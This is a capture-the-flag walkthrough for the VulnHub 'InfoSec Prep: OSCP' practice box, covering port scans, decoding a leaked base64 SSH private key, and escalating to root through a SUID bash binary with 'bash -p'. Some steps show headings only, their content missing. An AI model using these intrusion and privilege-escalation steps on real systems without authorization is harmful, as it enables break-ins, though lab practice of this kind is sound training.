This is a walk-through of how to exploit a computer system.
Please
note that some of the techniques described are illegal
if you are not authorized to use them on the target machine.
The target is the "InfoSec Prep: OSCP" box on VulnHub, which is a site that offers machines for you to practice hacking.
0) Background
The box was created by FalconSpy, and used in a contest for a prize giveaway of a 30-day voucher for Offensive Security labs and training materials, and an exam attempt at the OSCP certification. After the launch, Tib3rius donated 20 copies of his Privesc courses for runner-ups. The contest was hosted on the InfoSec Prep Discord Server.
I ran Kali Linux as my hacking operating system, but the tools and commands below can be utilized on other versions of Linux if you install them. Both Kali and the InfoSec Prep box were run as virtual machines using VirtualBox.
If you have any questions, or if you see anything below that should be added, changed, or clarified, please contact me on Twitter: https://twitter.com/john_k57
The hack begins by scanning the target system to see which ports are open...
1) Initial scan
sudo nmap -T4 -p- 192.168.0.202
Note: Instead of 192.168.0.202 in these walkthrough steps, use whatever URL is displayed on the InfoSec Prep box's login screen when you spin it up in VirtualBox.
sudo enables you to run commands as the root user.
- -T4 sets the speed 1-5, with 1 being slowest, and 5 being fastest but can miss things, so 4 is ideal.
- -p- scans all ports, instead of the default first 1000.
Nmap results show 3 open ports:
2) Detailed scan of open ports
sudo nmap -A -T4 -p22,80,33060 192.168.0.202
- -A does a more thorough scan including version detection and script scanning.
- -p22,30,33060 scans only those 3 ports.
The scan results list a suspicious file:
3) Examine suspicious file
wget http://192.168.0.202/secret.txt
cat secret.txt
- cat displays the contents
Or you could visit the URL from the wget command in a browser.
Partial contents of secret.txt:It is encoded, and the "==" at the end points to Base64 encoding.
4) Decode file
base64 -d secret.txt > secret.decoded
- > directs the output to a new file, "secret.decoded"
cat secret.decoded
Decoded file contents:
...it's an OpenSSH Private Key.
5) Use Private Key to log in through SSH
6) Attempt to get flag
The location of the flag is indicated on VulnHub:
cat /root/flag.txt
But it appears we do not have permission:
7) Privilege escalation
Try the basics first:
sudo su -
...but we do not know the password, since we logged in using a private key instead.
Check for sticky bits, SUID (chmod 4000), which will run as the owner, not the user who executes it:
find / -perm -u=s -type f 2>/dev/null
Look for those that are known to be useful for possible privilege escalation, like bash, cat, cp, echo, find, less, more, nano, nmap, vim and others: https://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/
/usr/bin/bash is on the list!
We can view the permissions:
ls /usr/bin/bash -l
- ls lists it
- -l uses the long listing format, which includes permissions
The -p option with the bash command will run privileged mode:
bash -p
then to confirm:
whoami
...we have a shell as root!
8) Capture the flag
---------------------------------------------
Here's the entire process beginning-to-end, boot2root: